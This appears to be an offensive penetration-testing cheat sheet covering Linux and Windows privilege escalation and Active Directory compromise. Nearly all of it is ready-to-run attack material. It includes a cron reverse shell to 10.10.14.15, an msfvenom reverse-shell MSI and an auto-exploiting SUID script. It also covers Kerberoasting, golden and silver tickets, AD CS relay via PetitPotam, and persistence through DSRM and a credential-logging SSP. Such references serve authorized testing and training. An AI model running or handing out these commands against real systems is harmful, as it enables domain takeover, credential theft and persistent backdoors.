
## 🎯 QUICK REFERENCE: IF YOU SEE THIS → DO THIS

### LINPEAS/WINPEAS FINDINGS → EXPLOIT IMMEDIATELY

#### LINUX FINDINGS:
| Finding | Command to Exploit |
|---------|-------------------|
| **SUID find** | `find . -exec /bin/bash -p \; -quit` |
| **SUID vim** | `vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'` |
| **SUID bash** | `bash -p` |
| **SUID nmap** | `nmap --interactive` then `!sh` |
| **SUID less/more** | `less /etc/passwd` then `!/bin/bash` |
| **SUID awk** | `awk 'BEGIN {system("/bin/bash -p")}'` |
| **SUID python** | `python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'` |
| **SUID perl** | `perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'` |
| **SUID php** | `php -r "posix_setuid(0); system('/bin/bash');"` |
| **Capabilities (python)** | `python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'` |
| **Capabilities (perl)** | `perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'` |
| **Sudo ALL** | `sudo bash` |
| **Sudo find** | `sudo find /etc/passwd -exec bash \;` |
| **Sudo vi/vim** | `sudo vi -c ':!bash'` |
| **Sudo awk** | `sudo awk 'BEGIN {system("/bin/bash")}'` |
| **Sudo nmap** | `echo 'os.execute("/bin/bash")' > /tmp/shell.nse; sudo nmap --script=/tmp/shell.nse` |
| **Sudo git** | `sudo git -p help` then `!/bin/bash` |
| **Cron job writable** | `echo 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1' >> /path/to/cron/script.sh; chmod +x /path/to/cron/script.sh` |

#### WINDOWS FINDINGS:
| Finding | Command to Exploit |
|---------|-------------------|
| **Unquoted Service Path** | `sc config SERVICE binPath= "C:\Windows\System32\cmd.exe /c net user hacker Password123! /add"` |
| **Weak Service Permissions** | `sc config SERVICE binPath= "cmd.exe /c net localgroup administrators hacker /add"` |
| **AlwaysInstallElevated** | `msiexec /quiet /qn /i C:\temp\setup.msi` (create with msfvenom) |
| **SeImpersonate/SeAssignPrimaryToken** | Use JuicyPotato/RoguePotato/PrintSpoofer |
| **DLL Hijacking** | Place malicious DLL in writable path |
| **Writable PATH directory** | Place executable with same name as common command |

#### AD BLOODHOUND FINDINGS:
| Finding | Tool/Command | What to Do Next |
|---------|-------------|----------------|
| **GenericAll on User** | PowerView | `Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)` |
| **GenericAll on Group** | PowerView | `Add-DomainGroupMember -Identity 'Domain Admins' -Members YourUser` |
| **WriteDACL on Domain** | PowerView | `Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity YourUser -Rights DCSync` |
| **WriteOwner on Object** | PowerView | `Set-DomainObjectOwner -Identity TargetObject -OwnerIdentity YourUser` then modify |
| **DCSync rights** | Mimikatz/Impacket | `lsadump::dcsync /domain:domain /user:krbtgt` OR `impacket-secretsdump domain/user:pass@DC` |
| **Unconstrained Delegation** | Rubeus | `Rubeus.exe monitor /interval:5 /filteruser:DC01$` then dump tickets |
| **Constrained Delegation** | Rubeus | `Rubeus.exe s4u /user:Service /rc4:HASH /impersonateuser:Admin /msdsspn:cifs/TARGET` |
| **Resource-Based Constrained Delegation** | PowerView + Rubeus | Create computer, set RBCD, get S4U2Proxy ticket |
| **AD CS ESC1** | Certipy | `certipy req -u user -p pass -ca CA -target DC -template TEMPLATE -upn Administrator` |
| **AD CS ESC8** | NTLM Relay | `ntlmrelayx.py -t http://DC/certsrv/certfnsh.asp --adcs --template DomainController` |
| **DNSAdmins** | dnscmd | `dnscmd /config /serverlevelplugindll \\attacker\share\malicious.dll` |
| **Exchange Windows Permissions** | PowerView | `Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity YourUser -Rights DCSync` |

## 🛠️ AUTOMATED SCRIPTS WITH USAGE

### SCRIPT 1: COMPLETE AD ENUMERATION (`ad_enum.sh`)
```bash
#!/bin/bash
# USAGE: ./ad_enum.sh <TARGET_IP> <DOMAIN>
# EXAMPLE: ./ad_enum.sh 10.10.10.10 corp.local

if [ $# -ne 2 ]; then
    echo "Usage: $0 <TARGET_IP> <DOMAIN>"
    echo "Example: $0 10.10.10.10 corp.local"
    exit 1
fi

TARGET=$1
DOMAIN=$2
OUTPUT_DIR="ad_scan_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR

echo "[*] Starting AD enumeration on $TARGET ($DOMAIN)"

# Phase 1: Network scan
echo "[1/5] Network scan..."
nmap -p 88,389,445,636,3268,3269,5985,53,135,139 -sV -oN $OUTPUT_DIR/ports.txt $TARGET > /dev/null 2>&1

# Phase 2: SMB enumeration
echo "[2/5] SMB enumeration..."
netexec smb $TARGET --shares > $OUTPUT_DIR/smb_shares.txt 2>&1
netexec smb $TARGET --users > $OUTPUT_DIR/smb_users.txt 2>&1

# Phase 3: LDAP enumeration
echo "[3/5] LDAP enumeration..."
ldapsearch -x -H ldap://$TARGET -b "" -s base namingContexts > $OUTPUT_DIR/ldap_base.txt 2>&1
if grep -q "namingContexts" $OUTPUT_DIR/ldap_base.txt; then
    DC_DN=$(grep namingContexts $OUTPUT_DIR/ldap_base.txt | head -1 | awk '{print $2}')
    ldapsearch -x -H ldap://$TARGET -b "$DC_DN" "(objectClass=user)" sAMAccountName > $OUTPUT_DIR/ldap_users.txt 2>&1
fi

# Phase 4: Kerberos attacks
echo "[4/5] Kerberos attacks..."
GetNPUsers.py $DOMAIN/ -no-pass -dc-ip $TARGET -usersfile /usr/share/seclists/Usernames/top-usernames-shortlist.txt > $OUTPUT_DIR/asrep.txt 2>&1
GetUserSPNs.py $DOMAIN/ -no-pass -dc-ip $TARGET > $OUTPUT_DIR/kerberoast.txt 2>&1

# Phase 5: Summary
echo "[5/5] Generating summary..."
echo "=== AD ENUMERATION SUMMARY ===" > $OUTPUT_DIR/summary.txt
echo "Target: $TARGET" >> $OUTPUT_DIR/summary.txt
echo "Domain: $DOMAIN" >> $OUTPUT_DIR/summary.txt
echo "Open ports: $(grep open $OUTPUT_DIR/ports.txt | wc -l)" >> $OUTPUT_DIR/summary.txt
echo "SMB Shares: $(grep -c 'READ\|WRITE' $OUTPUT_DIR/smb_shares.txt)" >> $OUTPUT_DIR/summary.txt
echo "LDAP Users: $(grep -c 'sAMAccountName:' $OUTPUT_DIR/ldap_users.txt 2>/dev/null || echo 0)" >> $OUTPUT_DIR/summary.txt
echo "AS-REP Roastable: $(grep -c '\$krb5asrep' $OUTPUT_DIR/asrep.txt)" >> $OUTPUT_DIR/summary.txt
echo "Kerberoastable: $(grep -c 'ServicePrincipalName' $OUTPUT_DIR/kerberoast.txt)" >> $OUTPUT_DIR/summary.txt

echo "[+] Scan complete! Results in: $OUTPUT_DIR/"
cat $OUTPUT_DIR/summary.txt


# USAGE: powershell -ep bypass -c ". .\win_auto_privesc.ps1; Invoke-AutoPrivEsc"

function Invoke-AutoPrivEsc {
    Write-Host "[*] Starting Windows Auto-PrivEsc Check" -ForegroundColor Cyan
    
    # Check AlwaysInstallElevated
    $reg1 = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
    $reg2 = Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
    
    if ($reg1.AlwaysInstallElevated -eq 1 -and $reg2.AlwaysInstallElevated -eq 1) {
        Write-Host "[!] ALWAYSINSTALLELEVATED ENABLED!" -ForegroundColor Red
        Write-Host "[+] Exploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f msi -o setup.msi" -ForegroundColor Yellow
        Write-Host "[+] Command: msiexec /quiet /qn /i C:\temp\setup.msi" -ForegroundColor Yellow
    }
    
    # Check Unquoted Service Paths
    $services = Get-WmiObject win32_service | Where-Object {$_.PathName -like "* *" -and $_.PathName -notlike '"*"'} | Select-Object Name, PathName
    
    if ($services) {
        Write-Host "[!] UNQUOTED SERVICE PATHS FOUND!" -ForegroundColor Red
        foreach ($service in $services) {
            Write-Host "[+] Service: $($service.Name)" -ForegroundColor Yellow
            Write-Host "[+] Path: $($service.PathName)" -ForegroundColor Yellow
            $pathParts = $service.PathName.Split('\')
            $writablePath = $pathParts[0] + '\' + $pathParts[1]
            Write-Host "[+] Check if $writablePath is writable with: icacls `"$writablePath`"" -ForegroundColor Yellow
        }
    }
    
    # Check Weak Service Permissions
    Write-Host "[*] Checking service permissions..." -ForegroundColor Cyan
    Get-Service | ForEach-Object {
        $name = $_.Name
        try {
            $acl = sc.exe sdshow $name 2>$null
            if ($acl -match "WD.*RP") {
                Write-Host "[!] WEAK SERVICE PERMISSIONS: $name" -ForegroundColor Red
                Write-Host "[+] Exploit: sc config $name binPath= `"cmd.exe /c net user hacker Password123! /add`"" -ForegroundColor Yellow
                Write-Host "[+] Then: sc stop $name && sc start $name" -ForegroundColor Yellow
            }
        } catch {}
    }
    
    # Check Token Privileges
    $privileges = whoami /priv 2>$null
    if ($privileges -match "SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege") {
        Write-Host "[!] POTATO EXPLOIT POSSIBLE!" -ForegroundColor Red
        Write-Host "[+] Try: JuicyPotato, RoguePotato, PrintSpoofer" -ForegroundColor Yellow
        Write-Host "[+] Command: .\JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -a `/c whoami -a c:\windows\temp\out.txt`" -ForegroundColor Yellow
    }
    
    # Check Scheduled Tasks
    $tasks = Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM" -and $_.State -eq "Ready"}
    if ($tasks) {
        Write-Host "[!] SCHEDULED TASKS RUNNING AS SYSTEM" -ForegroundColor Red
        $tasks | Select-Object TaskName -First 5 | ForEach-Object {
            Write-Host "[+] Task: $($_.TaskName)" -ForegroundColor Yellow
        }
        Write-Host "[+] Check XML files in: C:\Windows\System32\Tasks\" -ForegroundColor Yellow
    }
    
    Write-Host "`n[*] Auto-check complete! Upload winPEAS for detailed scan." -ForegroundColor Green
}

Invoke-AutoPrivEsc



#!/bin/bash
# USAGE: ./auto_suid.sh
# Run after LinPEAS shows SUID binaries

echo "[*] Scanning for SUID binaries..."
find / -perm -4000 -type f 2>/dev/null | while read binary; do
    echo "[*] Checking: $binary"
    
    case $(basename "$binary") in
        "find")
            echo "[+] Exploiting find..."
            $binary . -exec /bin/bash -p \; -quit
            ;;
        "vim"|"vi")
            echo "[+] Exploiting vim..."
            $binary -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
            ;;
        "bash")
            echo "[+] Exploiting bash..."
            $binary -p
            ;;
        "nmap")
            echo "[+] Exploiting nmap..."
            echo 'os.execute("/bin/bash")' > /tmp/shell.nse
            $binary --script=/tmp/shell.nse
            ;;
        "less"|"more")
            echo "[+] Exploiting $(basename "$binary")..."
            $binary /etc/passwd
            echo "Type '!/bin/bash' after less opens"
            ;;
        "awk")
            echo "[+] Exploiting awk..."
            $binary 'BEGIN {system("/bin/bash -p")}'
            ;;
        "python"|"python3"|"python2")
            echo "[+] Exploiting $(basename "$binary")..."
            $binary -c 'import os; os.setuid(0); os.system("/bin/bash")'
            ;;
        "perl")
            echo "[+] Exploiting perl..."
            $binary -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
            ;;
        "php")
            echo "[+] Exploiting php..."
            $binary -r "posix_setuid(0); system('/bin/bash');"
            ;;
        *)
            echo "[-] No auto-exploit for $(basename "$binary")"
            ;;
    esac
done




# 1. AS-REP Roasting (users with pre-auth disabled)
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -request
hashcat -m 18200 hashes.txt rockyou.txt --force

# 2. Kerberoasting (service accounts with SPNs)
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request
hashcat -m 13100 hashes.txt rockyou.txt --force

# 3. Golden Ticket (requires krbtgt hash)
# Get krbtgt hash via DCSync first
impacket-secretsdump domain.com/user:password@DC_IP
# Create golden ticket
ticketer.py -nthash KRBTGT_NTHASH -domain-sid S-1-5-21-... -domain domain.com Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py domain.com/Administrator@DC_IP -k -no-pass

# 4. Silver Ticket (service account hash)
# Get service account hash (e.g., CIFS)
mimikatz # sekurlsa::logonpasswords
# Create silver ticket
kerberos::golden /user:Administrator /domain:domain.com /sid:SID /target:DC.domain.com /service:cifs /rc4:SERVICE_HASH /ptt
dir \\DC.domain.com\C$

# 5. Pass-the-Ticket
# Export tickets from memory
Rubeus.exe dump /nowrap
# Import on attacker machine
export KRB5CCNAME=ticket.ccache
psexec.py domain.com/Administrator@DC_IP -k -no-pass

# 6. Overpass-the-Hash
Rubeus.exe asktgt /user:Administrator /domain:domain.com /rc4:NTLM_HASH /ptt
klist
dir \\DC.domain.com\C$



# ESC1: Misconfigured Template (ENROLLEE_SUPPLIES_SUBJECT)
certipy find -u user@domain.com -p password -dc-ip DC_IP
certipy req -u user@domain.com -p password -ca CA-NAME -target DC.domain.com -template VULNERABLE-TEMPLATE -upn Administrator@domain.com
certipy auth -pfx administrator.pfx -dc-ip DC_IP
impacket-psexec -hashes :NTLM_HASH domain.com/Administrator@DC.domain.com

# ESC2: Any Purpose Template (same as ESC1)

# ESC3: Enrollment Agent
certipy req -u user@domain.com -p password -ca CA-NAME -target DC.domain.com -template EnrollmentAgent
certipy req -u user@domain.com -p password -ca CA-NAME -target DC.domain.com -template User -on-behalf-of domain.com\\Administrator -pfx user.pfx

# ESC4: Writeable Certificate Template
certipy template -u user@domain.com -p password -dc-ip DC_IP -template VULNERABLE-TEMPLATE -save-old -enrollee-supplies-subject
# Then exploit as ESC1

# ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
certipy find -u user@domain.com -p password -dc-ip DC_IP -vulnerable
certipy req -u user@domain.com -p password -ca CA-NAME -target DC.domain.com -template ANY-TEMPLATE -upn Administrator@domain.com

# ESC8: NTLM Relay to AD CS HTTP
# Start relay
ntlmrelayx.py -t http://DC.domain.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Force authentication
python3 PetitPotam.py -d domain.com -u user -p password ATTACKER_IP DC.domain.com
# Get certificate and hash
certipy auth -pfx DC.pfx -dc-ip DC_IP


# 1. Check if you can create computer accounts (ms-DS-MachineAccountQuota > 0)
Get-DomainObject -Identity "DC=domain,DC=com" -Properties ms-DS-MachineAccountQuota

# 2. Create computer account
New-MachineAccount -MachineAccount FAKECOMPUTER -Domain domain.com -DomainController DC.domain.com

# 3. Set RBCD on target computer
Set-DomainObject -Identity TARGETCOMPUTER$ -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=@('FAKECOMPUTER$')}

# 4. Get hash of FAKECOMPUTER
Rubeus.exe hash /password:Password123! /user:FAKECOMPUTER$ /domain:domain.com

# 5. Get S4U2Proxy ticket
Rubeus.exe s4u /user:FAKECOMPUTER$ /rc4:NTLM_HASH /impersonateuser:Administrator /msdsspn:cifs/TARGETCOMPUTER.domain.com /ptt

# 6. Access target
dir \\TARGETCOMPUTER.domain.com\C$


# 1. Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained | Select-Object Name

# 2. Compromise one of them, then monitor for DA tokens
Rubeus.exe monitor /interval:5 /filteruser:DC01$

# 3. When DA connects, dump tickets
Rubeus.exe triage
Rubeus.exe dump /service:krbtgt /nowrap

# 4. Import ticket on attacker machine
Rubeus.exe ptt /ticket:BASE64_TICKET

# 5. DCSync with stolen ticket
impacket-secretsdump -k -no-pass domain.com/


# 1. Get krbtgt hash via DCSync
impacket-secretsdump domain.com/Administrator:password@DC_IP

# 2. Create golden ticket (valid for 10 years)
ticketer.py -nthash KRBTGT_NTHASH -domain-sid S-1-5-21-... -domain domain.com Administrator -duration 5256000

# 3. Use whenever needed
export KRB5CCNAME=Administrator.ccache
psexec.py domain.com/Administrator@DC_IP -k -no-pass


# 1. Get service account hash (e.g., CIFS for file shares)
mimikatz # sekurlsa::logonpasswords

# 2. Create silver ticket for specific service
kerberos::golden /user:Administrator /domain:domain.com /sid:SID /target:DC.domain.com /service:cifs /rc4:SERVICE_HASH /ptt /id:500 /groups:512

# 3. Access service without authentication
dir \\DC.domain.com\C$


# 1. Check if DSRM password is set
ntdsutil "set dsrm password" "reset password on server null" q q

# 2. Change DSRM password (requires DA)
ntdsutil
set dsrm password
reset password on server DC01
<new_password>
<new_password>
q
q

# 3. Enable DSRM logon
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f

# 4. Logon with DSRM
psexec.exe -s \\DC01 cmd.exe


# 1. Install Mimikatz SSP
mimikatz # misc::memssp

# 2. All logons will be logged to C:\Windows\System32\mimilsa.log

# 3. Alternative: Install custom SSP
copy mimilib.dll C:\Windows\System32\
reg add "HKLM\System\CurrentControlSet\Control\Lsa\" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f


